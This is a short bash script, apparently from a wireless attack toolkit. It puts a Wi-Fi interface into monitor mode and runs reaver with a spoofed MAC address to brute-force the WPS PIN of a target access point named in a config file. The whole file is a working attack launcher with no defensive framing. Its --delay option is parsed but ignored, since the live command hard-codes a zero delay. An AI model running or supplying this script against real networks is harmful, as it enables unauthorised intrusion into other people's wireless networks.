#!/bin/bash

if [ "$(id -u)" != "0" ]; then
	echo "This script must be run as root" 1>&2
	exit 1
fi

if [ -f ../cfg/target.conf ]; then
	. ../cfg/target.conf
else
	echo "Error: No target set!"
	exit 1
fi

. ../cfg/hardware.conf

DELAY=0

if [ "$1" == "--help" ]; then
	echo "Options:"
	echo "--delay # - Specify delay between pin attempts" 
elif [ "$1" == "--delay" ]; then
	DELAY=$2
fi

ifconfig $WLAN down
iwconfig $WLAN mode managed
ifconfig $WLAN up
iwconfig $WLAN channel $CHANNEL
ifconfig $WLAN down
iwconfig $WLAN mode monitor
ifconfig $WLAN up

#reaver -i $WLAN -b $BSSID -m $FAKE_HOST -c $CHANNEL -v -d $DELAY -f -a
reaver -i $WLAN -b $BSSID -m $FAKE_HOST -c $CHANNEL -v -d 0 -f -a

# Is -E needed?
